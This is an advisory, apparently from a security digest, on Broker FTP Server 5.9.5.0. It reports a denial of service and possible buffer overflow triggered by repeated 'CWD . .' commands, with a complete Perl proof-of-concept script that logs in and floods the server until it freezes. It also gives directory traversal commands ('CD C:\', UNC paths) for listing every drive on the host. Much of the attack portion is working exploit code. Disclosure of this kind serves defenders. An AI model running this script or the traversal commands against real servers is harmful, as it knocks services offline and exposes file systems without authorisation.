COMMAND

    Broker FTP Server

SYSTEMS AFFECTED

    Broker FTP Server 5.9.5.0

PROBLEM

    ByteRage found following.

    1) Buffer Overflow / DoS
    ========================
    The  DoS,  which  completely  freezes  the  victim machine, can be
    triggered  by  repeatedly  sending  the  following  command (after
    logging in):

       CWD . .
       (CD ". ." with an FTP client)

    or even better by adding some more spaces between the dots:

        CWD .
        .

    the server seems  to regard these  dirs as valid  and appends them
    to the current path, causing a DoS after a certain bound has  been
    reached... (have to repeat the last one about 30 times or so...)

    Below is the script brokerdos.pl which automates this:

    #!/usr/bin/perl
    
    # Broker FTP Server 5.9.5.0 DoS proof of concept
    #
    # Syntax : perl brokerdos.pl <host> <port> <loginid> <loginpwd>
    # Impact : eventually causes an access violation in the TSFTPSRV process
    #          the buffer overflow might be exploitable and be used to gain access
    #          to the FTP Server hostcomputer.
    #
    # by [ByteRage] <byterage@yahoo.com>
    # www.byterage.cjb.net (http://elf.box.sk/byterage/)
    
    use IO::Socket;
    
    $loginid = "anonymous";
    $loginpwd = "anonymous";
    
    if (!($host = $ARGV[0])) { $host = "127.0.0.1"; } print "Logging on @ $host:";
    if (!($port = $ARGV[1])) { $port = "21"; } print "$port\n\n";
    if (!($loginid = $ARGV[2])) { $loginid = "anonymous"; }
    if (!($loginpwd = $ARGV[3])) { $loginpwd = "anonymous"; }
    
    $SOCK = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "Couldn't create socket !"; $SOCK->autoflush();
    
    # get daemon banner
    $reply = "";
    sysread($SOCK, $reply, 2000);
    print $reply;
    # login
    syswrite $SOCK, "USER $loginid\015\012";
    sysread($SOCK, $reply, 2000);
    print $reply;
    syswrite $SOCK, "PASS $loginpwd\015\012";
    sysread($SOCK, $reply, 2000);
    print $reply;
    sysread($SOCK, $reply, 2000);
    print "$reply\nSending crash [";
    
    if (substr($reply,0,1) == '2') {
      # Login succesful, send CWD's
      $i = 1; while ($i) {
        $i = syswrite $SOCK, "CWD .                                                                             .\015\012";
        print ".";
        sleep(1);
      }
    print "]\nSocket write failed... possible cause : Host down :(\n";
    }
    close($SOCK);
    exit();

    ByteRage has been able once  to make Broker FTP Server  crash this
    way setting the EIP to something  like "  .\" (and SoftIce  popped
    up) so this buffer overflow might be exploitable... not been  able
    to reproduce this situation afterwards though.  Also, the file  at
    C:\Program  Files\TransSoft  Ltd\Broker  5\Data\Errors.log gave us
    access violations at offsets  that were definitely taken  from the
    input string. (like 20202020, 2020202E etc...)

    2) Directory Traversal
    ======================
    You  can  map  out  the  contents  of every drive available to the
    system in the following manner...   (You don't seem to be able  to
    upload / download files though).

    To go out  of the home  directory type the  following in your  FTP
    client:

        CD C: or CD C:\

    (you can also go to the A: drive with CD A: (or CD-roms &  network
    drives)) Now you can list out  the contents of the drive with  the
    FTP client:

        LS

    And dive into subdirs with something like:

        CD C:\WINDOWS\

    etc...  Although  you can map  every drive, you  don't seem to  be
    able to send/recieve files.   It is also possible to  traverse the
    homedirectory using UNC pathnames  (starting with \\) which  might
    be used to remotely access local shares.

SOLUTION

    Nothing yet.